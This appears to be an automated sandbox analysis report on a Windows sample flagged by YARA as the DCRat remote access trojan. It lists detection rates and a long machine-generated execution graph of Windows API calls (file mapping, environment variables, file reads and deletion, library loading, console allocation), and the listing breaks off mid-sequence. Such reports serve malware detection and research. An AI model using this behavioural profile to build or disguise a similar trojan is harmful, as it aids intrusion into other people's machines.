                              MD5 hash:960DC58A366579A52C966ACC596733B6
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000025.00000002.1825230562.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Antivirus matches:
                              • Detection: 88%, ReversingLabs
                              • Detection: 68%, Virustotal, Browse
                              Has exited:true

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:9.7%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:9.2%
                                Total number of Nodes:1496
                                Total number of Limit Nodes:28
                                execution_graph 22835 d610d5 22840 d65bd7 22835->22840 22841 d65be1 __EH_prolog 22840->22841 22847 d6b07d 22841->22847 22843 d65bed 22853 d65dcc GetCurrentProcess GetProcessAffinityMask 22843->22853 22848 d6b087 __EH_prolog 22847->22848 22854 d6ea80 80 API calls 22848->22854 22850 d6b099 22855 d6b195 22850->22855 22854->22850 22856 d6b1a7 ___scrt_get_show_window_mode 22855->22856 22859 d70948 22856->22859 22862 d70908 GetCurrentProcess GetProcessAffinityMask 22859->22862 22863 d6b10f 22862->22863 22863->22843 22865 d7ead2 22866 d7eade ___DestructExceptionObject 22865->22866 22891 d7e5c7 22866->22891 22868 d7eae5 22870 d7eb0e 22868->22870 22971 d7ef05 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 22868->22971 22875 d7eb4d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 22870->22875 22902 d8824d 22870->22902 22874 d7eb2d ___DestructExceptionObject 22881 d7ebad 22875->22881 22972 d87243 38 API calls 2 library calls 22875->22972 22910 d7f020 22881->22910 22886 d7ebd9 22888 d7ebe2 22886->22888 22973 d8764a 28 API calls _abort 22886->22973 22974 d7e73e 13 API calls 2 library calls 22888->22974 22892 d7e5d0 22891->22892 22975 d7ed5b IsProcessorFeaturePresent 22892->22975 22894 d7e5dc 22976 d82016 22894->22976 22896 d7e5e1 22897 d7e5e5 22896->22897 22985 d880d7 22896->22985 22897->22868 22900 d7e5fc 22900->22868 22903 d88264 22902->22903 22904 d7ec4a ___delayLoadHelper2@8 5 API calls 22903->22904 22905 d7eb27 22904->22905 22905->22874 22906 d881f1 22905->22906 22908 d88220 22906->22908 22907 d7ec4a ___delayLoadHelper2@8 5 API calls 22909 d88249 22907->22909 22908->22907 22909->22875 23122 d7f350 22910->23122 22913 d7ebb3 22914 d8819e 22913->22914 23124 d8b290 22914->23124 22916 d7ebbc 22919 d7d5d4 22916->22919 22917 d881a7 22917->22916 23128 d8b59a 38 API calls 22917->23128 23292 d700cf 22919->23292 22923 d7d5f3 23341 d7a335 22923->23341 22925 d7d5fc 23345 d713b3 GetCPInfo 22925->23345 22927 d7d606 ___scrt_get_show_window_mode 22928 d7d619 GetCommandLineW 22927->22928 22929 d7d6a6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 22928->22929 22930 d7d628 22928->22930 23359 d6400a 22929->23359 23348 d7bc84 22930->23348 22936 d7d636 OpenFileMappingW 22940 d7d696 CloseHandle 22936->22940 22941 d7d64f MapViewOfFile 22936->22941 22937 d7d6a0 23353 d7d287 22937->23353 22940->22929 22943 d7d660 __vsnwprintf_l 22941->22943 22944 d7d68d UnmapViewOfFile 22941->22944 22948 d7d287 2 API calls 22943->22948 22944->22940 22949 d7d67c 22948->22949 22949->22944 22950 d78835 8 API calls 22951 d7d76a DialogBoxParamW 22950->22951 22952 d7d7a4 22951->22952 22953 d7d7b6 Sleep 22952->22953 22954 d7d7bd 22952->22954 22953->22954 22956 d7d7cb 22954->22956 23392 d7a544 CompareStringW SetCurrentDirectoryW ___scrt_get_show_window_mode 22954->23392 22957 d7d7ea DeleteObject 22956->22957 22958 d7d806 22957->22958 22959 d7d7ff DeleteObject 22957->22959 22960 d7d837 22958->22960 22963 d7d849 22958->22963 22959->22958 23393 d7d2e6 6 API calls 22960->23393 22962 d7d83d CloseHandle 22962->22963 23389 d7a39d 22963->23389 22965 d7d883 22966 d8757e GetModuleHandleW 22965->22966 22967 d7ebcf 22966->22967 22967->22886 22968 d876a7 22967->22968 23644 d87424 22968->23644 22971->22868 22972->22881 22973->22888 22974->22874 22975->22894 22977 d8201b ___vcrt_initialize_pure_virtual_call_handler ___vcrt_initialize_winapi_thunks 22976->22977 22989 d8310e 22977->22989 22981 d82031 22982 d8203c 22981->22982 23003 d8314a DeleteCriticalSection 22981->23003 22982->22896 22984 d82029 22984->22896 23031 d8b73a 22985->23031 22988 d8203f 8 API calls 3 library calls 22988->22897 22990 d83117 22989->22990 22992 d83140 22990->22992 22993 d82025 22990->22993 23004 d83385 22990->23004 23009 d8314a DeleteCriticalSection 22992->23009 22993->22984 22995 d8215c 22993->22995 23024 d8329a 22995->23024 22997 d82166 22998 d82171 22997->22998 23029 d83348 6 API calls try_get_function 22997->23029 22998->22981 23000 d8217f 23001 d8218c 23000->23001 23030 d8218f 6 API calls ___vcrt_FlsFree 23000->23030 23001->22981 23003->22984 23010 d83179 23004->23010 23007 d833bc InitializeCriticalSectionAndSpinCount 23008 d833a8 23007->23008 23008->22990 23009->22993 23011 d831ad 23010->23011 23013 d831a9 23010->23013 23011->23007 23011->23008 23013->23011 23015 d831cd 23013->23015 23017 d83219 23013->23017 23014 d831d9 GetProcAddress 23016 d831e9 __crt_fast_encode_pointer 23014->23016 23015->23011 23015->23014 23016->23011 23018 d83241 LoadLibraryExW 23017->23018 23022 d83236 23017->23022 23019 d8325d GetLastError 23018->23019 23020 d83275 23018->23020 23019->23020 23023 d83268 LoadLibraryExW 23019->23023 23021 d8328c FreeLibrary 23020->23021 23020->23022 23021->23022 23022->23013 23023->23020 23025 d83179 try_get_function 5 API calls 23024->23025 23026 d832b4 23025->23026 23027 d832cc TlsAlloc 23026->23027 23028 d832bd 23026->23028 23028->22997 23029->23000 23030->22998 23034 d8b757 23031->23034 23035 d8b753 23031->23035 23033 d7e5ee 23033->22900 23033->22988 23034->23035 23037 d89e60 23034->23037 23049 d7ec4a 23035->23049 23038 d89e6c ___DestructExceptionObject 23037->23038 23056 d8a3f1 EnterCriticalSection 23038->23056 23040 d89e73 23057 d8bc39 23040->23057 23042 d89e82 23043 d89e91 23042->23043 23070 d89ce9 29 API calls 23042->23070 23072 d89ead LeaveCriticalSection _abort 23043->23072 23046 d89e8c 23071 d89d9f GetStdHandle GetFileType 23046->23071 23047 d89ea2 ___DestructExceptionObject 23047->23034 23050 d7ec55 IsProcessorFeaturePresent 23049->23050 23051 d7ec53 23049->23051 23053 d7f267 23050->23053 23051->23033 23121 d7f22b SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23053->23121 23055 d7f34a 23055->23033 23056->23040 23058 d8bc45 ___DestructExceptionObject 23057->23058 23059 d8bc69 23058->23059 23060 d8bc52 23058->23060 23073 d8a3f1 EnterCriticalSection 23059->23073 23081 d8895a 20 API calls _abort 23060->23081 23063 d8bc75 23069 d8bca1 23063->23069 23074 d8bb8a 23063->23074 23064 d8bc57 23082 d88839 26 API calls pre_c_initialization 23064->23082 23066 d8bc61 ___DestructExceptionObject 23066->23042 23083 d8bcc8 LeaveCriticalSection _abort 23069->23083 23070->23046 23071->23043 23072->23047 23073->23063 23084 d885a9 23074->23084 23076 d8bb9c 23080 d8bba9 23076->23080 23091 d8a6ca 23076->23091 23079 d8bbfb 23079->23063 23098 d884de 23080->23098 23081->23064 23082->23066 23083->23066 23085 d885b6 FindHandler 23084->23085 23086 d885f6 23085->23086 23087 d885e1 RtlAllocateHeap 23085->23087 23104 d871ad 7 API calls 2 library calls 23085->23104 23105 d8895a 20 API calls _abort 23086->23105 23087->23085 23088 d885f4 23087->23088 23088->23076 23106 d8a458 23091->23106 23094 d8a70f InitializeCriticalSectionAndSpinCount 23095 d8a6fa 23094->23095 23096 d7ec4a ___delayLoadHelper2@8 5 API calls 23095->23096 23097 d8a726 23096->23097 23097->23076 23099 d884e9 RtlFreeHeap 23098->23099 23100 d88512 __dosmaperr 23098->23100 23099->23100 23101 d884fe 23099->23101 23100->23079 23120 d8895a 20 API calls _abort 23101->23120 23103 d88504 GetLastError 23103->23100 23104->23085 23105->23088 23107 d8a488 23106->23107 23110 d8a484 23106->23110 23107->23094 23107->23095 23108 d8a4a8 23108->23107 23111 d8a4b4 GetProcAddress 23108->23111 23110->23107 23110->23108 23113 d8a4f4 23110->23113 23112 d8a4c4 __crt_fast_encode_pointer 23111->23112 23112->23107 23114 d8a50a 23113->23114 23115 d8a515 LoadLibraryExW 23113->23115 23114->23110 23116 d8a532 GetLastError 23115->23116 23119 d8a54a 23115->23119 23117 d8a53d LoadLibraryExW 23116->23117 23116->23119 23117->23119 23118 d8a561 FreeLibrary 23118->23114 23119->23114 23119->23118 23120->23103 23121->23055 23123 d7f033 GetStartupInfoW 23122->23123 23123->22913 23125 d8b299 23124->23125 23126 d8b2a2 23124->23126 23129 d8b188 23125->23129 23126->22917 23128->22917 23149 d88fa5 GetLastError 23129->23149 23131 d8b195 23169 d8b2ae 23131->23169 23133 d8b19d 23178 d8af1b 23133->23178 23136 d8b1b4 23136->23126 23139 d8b1f7 23141 d884de _free 20 API calls 23139->23141 23141->23136 23143 d8b1f2 23202 d8895a 20 API calls _abort 23143->23202 23145 d8b23b 23145->23139 23203 d8adf1 26 API calls 23145->23203 23146 d8b20f 23146->23145 23147 d884de _free 20 API calls 23146->23147 23147->23145 23150 d88fbb 23149->23150 23151 d88fc1 23149->23151 23204 d8a61b 11 API calls 2 library calls 23150->23204 23153 d885a9 FindHandler 20 API calls 23151->23153 23155 d89010 SetLastError 23151->23155 23154 d88fd3 23153->23154 23160 d88fdb 23154->23160 23205 d8a671 11 API calls 2 library calls 23154->23205 23155->23131 23157 d884de _free 20 API calls 23159 d88fe1 23157->23159 23158 d88ff0 23158->23160 23161 d88ff7 23158->23161 23162 d8901c SetLastError 23159->23162 23160->23157 23206 d88e16 20 API calls _abort 23161->23206 23207 d88566 38 API calls _abort 23162->23207 23164 d89002 23166 d884de _free 20 API calls 23164->23166 23168 d89009 23166->23168 23168->23155 23168->23162 23170 d8b2ba ___DestructExceptionObject 23169->23170 23171 d88fa5 pre_c_initialization 38 API calls 23170->23171 23176 d8b2c4 23171->23176 23173 d8b348 ___DestructExceptionObject 23173->23133 23176->23173 23177 d884de _free 20 API calls 23176->23177 23208 d88566 38 API calls _abort 23176->23208 23209 d8a3f1 EnterCriticalSection 23176->23209 23210 d8b33f LeaveCriticalSection _abort 23176->23210 23177->23176 23211 d83dd6 23178->23211 23181 d8af3c GetOEMCP 23183 d8af65 23181->23183 23182 d8af4e 23182->23183 23184 d8af53 GetACP 23182->23184 23183->23136 23185 d88518 23183->23185 23184->23183 23186 d88556 23185->23186 23191 d88526 FindHandler 23185->23191 23222 d8895a 20 API calls _abort 23186->23222 23188 d88541 RtlAllocateHeap 23189 d88554 23188->23189 23188->23191 23189->23139 23192 d8b350 23189->23192 23191->23186 23191->23188 23221 d871ad 7 API calls 2 library calls 23191->23221 23193 d8af1b 40 API calls 23192->23193 23194 d8b36f 23193->23194 23197 d8b3c0 IsValidCodePage 23194->23197 23199 d8b376 23194->23199 23201 d8b3e5 ___scrt_get_show_window_mode 23194->23201 23195 d7ec4a ___delayLoadHelper2@8 5 API calls 23196 d8b1ea 23195->23196 23196->23143 23196->23146 23198 d8b3d2 GetCPInfo 23197->23198 23197->23199 23198->23199 23198->23201 23199->23195 23223 d8aff4 GetCPInfo 23201->23223 23202->23139 23203->23139 23204->23151 23205->23158 23206->23164 23209->23176 23210->23176 23212 d83de9 23211->23212 23213 d83df3 23211->23213 23212->23181 23212->23182 23213->23212 23214 d88fa5 pre_c_initialization 38 API calls 23213->23214 23215 d83e14 23214->23215 23219 d890fa 38 API calls __cftof 23215->23219 23217 d83e2d 23220 d89127 38 API calls __cftof 23217->23220 23219->23217 23220->23212 23221->23191 23222->23189 23224 d8b0d8 23223->23224 23230 d8b02e 23223->23230 23227 d7ec4a ___delayLoadHelper2@8 5 API calls 23224->23227 23229 d8b184 23227->23229 23229->23199 23233 d8c099 23230->23233 23232 d8a275 __vsnwprintf_l 43 API calls 23232->23224 23234 d83dd6 __cftof 38 API calls 23233->23234 23235 d8c0b9 MultiByteToWideChar 23234->23235 23237 d8c18f 23235->23237 23238 d8c0f7 23235->23238 23239 d7ec4a ___delayLoadHelper2@8 5 API calls 23237->23239 23240 d88518 __vsnwprintf_l 21 API calls 23238->23240 23243 d8c118 __vsnwprintf_l ___scrt_get_show_window_mode 23238->23243 23241 d8b08f 23239->23241 23240->23243 23247 d8a275 23241->23247 23242 d8c189 23252 d8a2c0 20 API calls _free 23242->23252 23243->23242 23245 d8c15d MultiByteToWideChar 23243->23245 23245->23242 23246 d8c179 GetStringTypeW 23245->23246 23246->23242 23248 d83dd6 __cftof 38 API calls 23247->23248 23249 d8a288 23248->23249 23253 d8a058 23249->23253 23252->23237 23255 d8a073 __vsnwprintf_l 23253->23255 23254 d8a099 MultiByteToWideChar 23256 d8a24d 23254->23256 23257 d8a0c3 23254->23257 23255->23254 23258 d7ec4a ___delayLoadHelper2@8 5 API calls 23256->23258 23260 d88518 __vsnwprintf_l 21 API calls 23257->23260 23263 d8a0e4 __vsnwprintf_l 23257->23263 23259 d8a260 23258->23259 23259->23232 23260->23263 23261 d8a12d MultiByteToWideChar 23262 d8a199 23261->23262 23264 d8a146 23261->23264 23289 d8a2c0 20 API calls _free 23262->23289 23263->23261 23263->23262 23280 d8a72c 23264->23280 23268 d8a1a8 23272 d88518 __vsnwprintf_l 21 API calls 23268->23272 23275 d8a1c9 __vsnwprintf_l 23268->23275 23269 d8a170 23269->23262 23270 d8a72c __vsnwprintf_l 11 API calls 23269->23270 23270->23262 23271 d8a23e 23288 d8a2c0 20 API calls _free 23271->23288 23272->23275 23273 d8a72c __vsnwprintf_l 11 API calls 23276 d8a21d 23273->23276 23275->23271 23275->23273 23276->23271 23277 d8a22c WideCharToMultiByte 23276->23277 23277->23271 23278 d8a26c 23277->23278 23290 d8a2c0 20 API calls _free 23278->23290 23281 d8a458 _abort 5 API calls 23280->23281 23282 d8a753 23281->23282 23285 d8a75c 23282->23285 23291 d8a7b4 10 API calls 3 library calls 23282->23291 23284 d8a79c LCMapStringW 23284->23285 23286 d7ec4a ___delayLoadHelper2@8 5 API calls 23285->23286 23287 d8a15d 23286->23287 23287->23262 23287->23268 23287->23269 23288->23262 23289->23256 23290->23262 23291->23284 23394 d7e360 23292->23394 23295 d70154 23297 d70484 GetModuleFileNameW 23295->23297 23405 d870dd 42 API calls 2 library calls 23295->23405 23296 d700f0 GetProcAddress 23298 d70121 GetProcAddress 23296->23298 23299 d70109 23296->23299 23310 d704a3 23297->23310 23298->23295 23300 d70133 23298->23300 23299->23298 23300->23295 23302 d703be 23302->23297 23303 d703c9 GetModuleFileNameW CreateFileW 23302->23303 23304 d703fc SetFilePointer 23303->23304 23305 d70478 CloseHandle 23303->23305 23304->23305 23306 d7040c ReadFile 23304->23306 23305->23297 23306->23305 23308 d7042b 23306->23308 23308->23305 23312 d70085 2 API calls 23308->23312 23311 d704d2 CompareStringW 23310->23311 23313 d70508 GetFileAttributesW 23310->23313 23314 d70520 23310->23314 23396 d6acf5 23310->23396 23399 d70085 23310->23399 23311->23310 23312->23308 23313->23310 23313->23314 23315 d7052a 23314->23315 23317 d70560 23314->23317 23318 d70542 GetFileAttributesW 23315->23318 23320 d7055a 23315->23320 23316 d7066f 23340 d79da4 GetCurrentDirectoryW 23316->23340 23317->23316 23319 d6acf5 GetVersionExW 23317->23319 23318->23315 23318->23320 23321 d7057a 23319->23321 23320->23317 23322 d705e7 23321->23322 23323 d70581 23321->23323 23324 d6400a _swprintf 51 API calls 23322->23324 23325 d70085 2 API calls 23323->23325 23326 d7060f AllocConsole 23324->23326 23327 d7058b 23325->23327 23328 d70667 ExitProcess 23326->23328 23329 d7061c GetCurrentProcessId AttachConsole 23326->23329 23330 d70085 2 API calls 23327->23330 23409 d835b3 23329->23409 23332 d70595 23330->23332 23406 d6ddd1 23332->23406 23333 d7063d GetStdHandle WriteConsoleW Sleep FreeConsole 23333->23328 23336 d6400a _swprintf 51 API calls 23337 d705c3 23336->23337 23338 d6ddd1 53 API calls 23337->23338 23339 d705d2 23338->23339 23339->23328 23340->22923 23342 d70085 2 API calls 23341->23342 23343 d7a349 OleInitialize 23342->23343 23344 d7a36c GdiplusStartup SHGetMalloc 23343->23344 23344->22925 23346 d713d7 IsDBCSLeadByte 23345->23346 23346->23346 23347 d713ef 23346->23347 23347->22927 23349 d7bc8e 23348->23349 23350 d7179d CharUpperW 23349->23350 23351 d7bda4 23349->23351 23434 d6ecad 80 API calls ___scrt_get_show_window_mode 23349->23434 23350->23349 23351->22936 23351->22937 23354 d7e360 23353->23354 23355 d7d294 SetEnvironmentVariableW 23354->23355 23356 d7d2b7 23355->23356 23357 d7d2df 23356->23357 23358 d7d2d3 SetEnvironmentVariableW 23356->23358 23357->22929 23358->23357 23435 d63fdd 23359->23435 23362 d7aded LoadBitmapW 23363 d7ae15 23362->23363 23364 d7ae0e 23362->23364 23366 d7ae1b GetObjectW 23363->23366 23367 d7ae2a 23363->23367 23469 d79e1c FindResourceW 23364->23469 23366->23367 23464 d79d1a 23367->23464 23370 d7ae80 23381 d6d31c 23370->23381 23371 d7ae5c 23483 d79d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23371->23483 23372 d79e1c 12 API calls 23374 d7ae4d 23372->23374 23374->23371 23376 d7ae53 DeleteObject 23374->23376 23375 d7ae64 23484 d79d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23375->23484 23376->23371 23378 d7ae6d 23485 d79f5d 8 API calls ___scrt_get_show_window_mode 23378->23485 23380 d7ae74 DeleteObject 23380->23370 23496 d6d341 23381->23496 23383 d6d328 23536 d6da4e GetModuleHandleW FindResourceW 23383->23536 23386 d78835 23635 d7e24a 23386->23635 23390 d7a3cc GdiplusShutdown OleUninitialize 23389->23390 23390->22965 23392->22956 23393->22962 23395 d700d9 GetModuleHandleW 23394->23395 23395->23295 23395->23296 23397 d6ad09 GetVersionExW 23396->23397 23398 d6ad45 23396->23398 23397->23398 23398->23310 23400 d7e360 23399->23400 23401 d70092 GetSystemDirectoryW 23400->23401 23402 d700aa 23401->23402 23403 d700c8 23401->23403 23404 d700bb LoadLibraryW 23402->23404 23403->23310 23404->23403 23405->23302 23411 d6ddff 23406->23411 23410 d835bb 23409->23410 23410->23333 23410->23410 23417 d6d28a 23411->23417 23414 d6de22 LoadStringW 23415 d6ddfc 23414->23415 23416 d6de39 LoadStringW 23414->23416 23415->23336 23416->23415 23422 d6d1c3 23417->23422 23419 d6d2bc 23419->23414 23419->23415 23420 d6d2a7 23420->23419 23430 d6d2c8 26 API calls 23420->23430 23423 d6d1de 23422->23423 23429 d6d1d7 _strncpy 23422->23429 23425 d6d202 23423->23425 23431 d71596 WideCharToMultiByte 23423->23431 23428 d6d233 23425->23428 23432 d6dd6b 50 API calls __vsnprintf 23425->23432 23433 d858d9 26 API calls 3 library calls 23428->23433 23429->23420 23430->23419 23431->23425 23432->23428 23433->23429 23434->23349 23436 d63ff4 __vswprintf_c_l 23435->23436 23439 d85759 23436->23439 23442 d83837 23439->23442 23443 d8385f 23442->23443 23444 d83877 23442->23444 23459 d8895a 20 API calls _abort 23443->23459 23444->23443 23446 d8387f 23444->23446 23448 d83dd6 __cftof 38 API calls 23446->23448 23447 d83864 23460 d88839 26 API calls pre_c_initialization 23447->23460 23450 d8388f 23448->23450 23461 d83da1 20 API calls 2 library calls 23450->23461 23452 d7ec4a ___delayLoadHelper2@8 5 API calls 23454 d63ffe SetEnvironmentVariableW GetModuleHandleW LoadIconW 23452->23454 23453 d83907 23462 d84186 51 API calls 3 library calls 23453->23462 23454->23362 23457 d8386f 23457->23452 23458 d83912 23463 d83e59 20 API calls _free 23458->23463 23459->23447 23460->23457 23461->23453 23462->23458 23463->23457 23486 d79d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23464->23486 23466 d79d21 23467 d79d2d 23466->23467 23487 d79d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23466->23487 23467->23370 23467->23371 23467->23372 23470 d79e3e SizeofResource 23469->23470 23472 d79e70 23469->23472 23471 d79e52 LoadResource 23470->23471 23470->23472 23471->23472 23473 d79e63 LockResource 23471->23473 23472->23363 23473->23472 23474 d79e77 GlobalAlloc 23473->23474 23474->23472 23475 d79e92 GlobalLock 23474->23475 23476 d79f21 GlobalFree 23475->23476 23477 d79ea1 __vsnwprintf_l 23475->23477 23476->23472 23478 d79f1a GlobalUnlock 23477->23478 23488 d79d7b GdipAlloc 23477->23488 23478->23476 23481 d79eef GdipCreateHBITMAPFromBitmap 23482 d79f05 23481->23482 23482->23478 23483->23375 23484->23378 23485->23380 23486->23466 23487->23467 23489 d79d8d 23488->23489 23490 d79d9a 23488->23490 23492 d79b0f 23489->23492 23490->23478 23490->23481 23490->23482 23493 d79b37 GdipCreateBitmapFromStream 23492->23493 23494 d79b30 GdipCreateBitmapFromStreamICM 23492->23494 23495 d79b3c 23493->23495 23494->23495 23495->23490 23497 d6d34b _wcschr __EH_prolog 23496->23497 23498 d6d37a GetModuleFileNameW 23497->23498 23499 d6d3ab 23497->23499 23500 d6d394 23498->23500 23538 d699b0 23499->23538 23500->23499 23503 d6d407 23549 d85a90 26 API calls 3 library calls 23503->23549 23504 d73781 76 API calls 23507 d6d3db 23504->23507 23507->23503 23507->23504 23531 d6d627 23507->23531 23508 d6d41a 23550 d85a90 26 API calls 3 library calls 23508->23550 23513 d6d42c 23518 d6d563 23513->23518 23513->23531 23551 d69e40 23513->23551 23566 d69bf0 23513->23566 23574 d69d30 77 API calls 23513->23574 23514 d6d57d new 23515 d69bf0 80 API calls 23514->23515 23514->23531 23516 d6d5a6 new 23515->23516 23516->23531 23534 d6d5b2 new 23516->23534 23576 d7137a MultiByteToWideChar 23516->23576 23518->23531 23575 d69d30 77 API calls 23518->23575 23520 d6d72b 23577 d6ce72 76 API calls 23520->23577 23522 d6da0a 23582 d6ce72 76 API calls 23522->23582 23524 d6d9fa 23524->23383 23525 d6d771 23578 d85a90 26 API calls 3 library calls 23525->23578 23527 d6d742 23527->23525 23529 d73781 76 API calls 23527->23529 23528 d6d78b 23579 d85a90 26 API calls 3 library calls 23528->23579 23529->23527 23559 d69653 23531->23559 23532 d71596 WideCharToMultiByte 23532->23534 23534->23520 23534->23522 23534->23524 23534->23531 23534->23532 23580 d6dd6b 50 API calls __vsnprintf 23534->23580 23581 d858d9 26 API calls 3 library calls 23534->23581 23537 d6d32f 23536->23537 23537->23386 23539 d699ba 23538->23539 23540 d69a39 CreateFileW 23539->23540 23541 d69aaa 23540->23541 23542 d69a59 GetLastError 23540->23542 23543 d69ae1 23541->23543 23545 d69ac7 SetFileTime 23541->23545 23583 d6b66c 23542->23583 23543->23507 23545->23543 23546 d69a79 23546->23541 23547 d69a7d CreateFileW GetLastError 23546->23547 23548 d69aa1 23547->23548 23548->23541 23549->23508 23550->23513 23552 d69e64 SetFilePointer 23551->23552 23553 d69e53 23551->23553 23554 d69e9d 23552->23554 23555 d69e82 GetLastError 23552->23555 23553->23554 23596 d66fa5 75 API calls 23553->23596 23554->23513 23555->23554 23557 d69e8c 23555->23557 23557->23554 23597 d66fa5 75 API calls 23557->23597 23560 d69677 23559->23560 23565 d69688 23559->23565 23561 d69683 23560->23561 23562 d6968a 23560->23562 23560->23565 23598 d69817 23561->23598 23603 d696d0 23562->23603 23565->23383 23567 d69c03 23566->23567 23571 d69bfc 23566->23571 23569 d69c9e 23567->23569 23567->23571 23572 d69cc0 23567->23572 23618 d6984e 23567->23618 23569->23571 23630 d66f6b 75 API calls 23569->23630 23571->23513 23572->23571 23573 d6984e 5 API calls 23572->23573 23573->23572 23574->23513 23575->23514 23576->23534 23577->23527 23578->23528 23579->23531 23580->23534 23581->23534 23582->23524 23584 d6b679 23583->23584 23592 d6b683 23584->23592 23593 d6b806 CharUpperW 23584->23593 23586 d6b692 23594 d6b832 CharUpperW 23586->23594 23588 d6b6a1 23589 d6b6a5 23588->23589 23590 d6b71c GetCurrentDirectoryW 23588->23590 23595 d6b806 CharUpperW 23589->23595 23590->23592 23592->23546 23593->23586 23594->23588 23595->23592 23596->23552 23597->23554 23599 d69824 23598->23599 23600 d69820 23598->23600 23599->23600 23609 d6a12d 23599->23609 23600->23565 23604 d696fa 23603->23604 23605 d696dc 23603->23605 23606 d69719 23604->23606 23617 d66e3e 74 API calls 23604->23617 23605->23604 23607 d696e8 FindCloseChangeNotification 23605->23607 23606->23565 23607->23604 23610 d7e360 23609->23610 23611 d6a13a DeleteFileW 23610->23611 23612 d6984c 23611->23612 23613 d6a14d 23611->23613 23612->23565 23614 d6b66c 2 API calls 23613->23614 23615 d6a161 23614->23615 23615->23612 23616 d6a165 DeleteFileW 23615->23616 23616->23612 23617->23606 23619 d69867 ReadFile 23618->23619 23620 d6985c GetStdHandle 23618->23620 23621 d69880 23619->23621 23622 d698a0 23619->23622 23620->23619 23631 d69989 23621->23631 23622->23567 23624 d69887 23625 d69895 23624->23625 23626 d698b7 23624->23626 23627 d698a8 GetLastError 23624->23627 23628 d6984e GetFileType 23625->23628 23626->23622 23629 d698c7 GetLastError 23626->23629 23627->23622 23627->23626 23628->23622 23629->23622 23629->23625 23630->23571 23632 d69992 GetFileType 23631->23632 23633 d6998f 23631->23633 23634 d699a0 23632->23634 23633->23624 23634->23624 23636 d7e24f new 23635->23636 23637 d78854 23636->23637 23641 d871ad 7 API calls 2 library calls 23636->23641 23642 d7ecce RaiseException FindHandler new 23636->23642 23643 d7ecb1 RaiseException Concurrency::cancel_current_task FindHandler 23636->23643 23637->22950 23641->23636 23645 d87430 _abort 23644->23645 23646 d87448 23645->23646 23647 d8757e _abort GetModuleHandleW 23645->23647 23666 d8a3f1 EnterCriticalSection 23646->23666 23649 d8743c 23647->23649 23649->23646 23678 d875c2 GetModuleHandleExW 23649->23678 23653 d87450 23656 d874c5 23653->23656 23665 d874ee 23653->23665 23686 d87f30 20 API calls _abort 23653->23686 23654 d8750b 23670 d8753d 23654->23670 23655 d87537 23687 d91a19 5 API calls ___delayLoadHelper2@8 23655->23687 23657 d874dd 23656->23657 23661 d881f1 _abort 5 API calls 23656->23661 23662 d881f1 _abort 5 API calls 23657->23662 23661->23657 23662->23665 23667 d8752e 23665->23667 23666->23653 23688 d8a441 LeaveCriticalSection 23667->23688 23669 d87507 23669->23654 23669->23655 23689 d8a836 23670->23689 23673 d8756b 23676 d875c2 _abort 8 API calls 23673->23676 23674 d8754b GetPEB 23674->23673 23675 d8755b GetCurrentProcess TerminateProcess 23674->23675 23675->23673 23677 d87573 ExitProcess 23676->23677 23679 d875ec GetProcAddress 23678->23679 23680 d8760f 23678->23680 23681 d87601 23679->23681 23682 d8761e 23680->23682 23683 d87615 FreeLibrary 23680->23683 23681->23680 23684 d7ec4a ___delayLoadHelper2@8 5 API calls 23682->23684 23683->23682 23685 d87628 23684->23685 23685->23646 23686->23656 23688->23669 23690 d8a85b 23689->23690 23693 d8a851 23689->23693 23691 d8a458 _abort 5 API calls 23690->23691 23691->23693 23692 d7ec4a ___delayLoadHelper2@8 5 API calls 23694 d87547 23692->23694 23693->23692 23694->23673 23694->23674 24759 d7acd0 100 API calls 24812 d719d0 26 API calls std::bad_exception::bad_exception 24760 d7a8c2 GetDlgItem EnableWindow ShowWindow SendMessageW 24761 d7eac0 27 API calls pre_c_initialization 24817 d797c0 10 API calls 24763 d89ec0 21 API calls 24818 d8b5c0 GetCommandLineA GetCommandLineW 24819 d8ebc1 21 API calls __vsnwprintf_l 24821 d7ebf7 20 API calls 24822 d8abfd 6 API calls ___delayLoadHelper2@8 23804 d7e1f9 23805 d7e203 23804->23805 23806 d7df59 ___delayLoadHelper2@8 19 API calls 23805->23806 23807 d7e210 23806->23807 23810 d7aee0 23811 d7aeea __EH_prolog 23810->23811 23973 d6130b 23811->23973 23814 d7af2c 23817 d7afa2 23814->23817 23818 d7af39 23814->23818 23878 d7af18 23814->23878 23815 d7b5cb 24038 d7cd2e 23815->24038 23820 d7b041 GetDlgItemTextW 23817->23820 23824 d7afbc 23817->23824 23821 d7af3e 23818->23821 23826 d7af75 23818->23826 23825 d7b077 23820->23825 23820->23826 23833 d6ddd1 53 API calls 23821->23833 23821->23878 23822 d7b5f7 23827 d7b611 GetDlgItem SendMessageW 23822->23827 23828 d7b600 SendDlgItemMessageW 23822->23828 23823 d7b5e9 SendMessageW 23823->23822 23832 d6ddd1 53 API calls 23824->23832 23830 d7b08f GetDlgItem 23825->23830 23971 d7b080 23825->23971 23829 d7af96 KiUserCallbackDispatcher 23826->23829 23826->23878 24056 d79da4 GetCurrentDirectoryW 23827->24056 23828->23827 23829->23878 23835 d7b0c5 SetFocus 23830->23835 23836 d7b0a4 SendMessageW SendMessageW 23830->23836 23837 d7afde SetDlgItemTextW 23832->23837 23838 d7af58 23833->23838 23834 d7b641 GetDlgItem 23839 d7b664 SetWindowTextW 23834->23839 23840 d7b65e 23834->23840 23841 d7b0d5 23835->23841 23857 d7b0ed 23835->23857 23836->23835 23842 d7afec 23837->23842 24078 d61241 SHGetMalloc 23838->24078 24057 d7a2c7 GetClassNameW 23839->24057 23840->23839 23845 d6ddd1 53 API calls 23841->23845 23850 d7aff9 GetMessageW 23842->23850 23842->23878 23849 d7b0df 23845->23849 23846 d7af5f 23851 d7af63 SetDlgItemTextW 23846->23851 23846->23878 23847 d7b56b 23852 d6ddd1 53 API calls 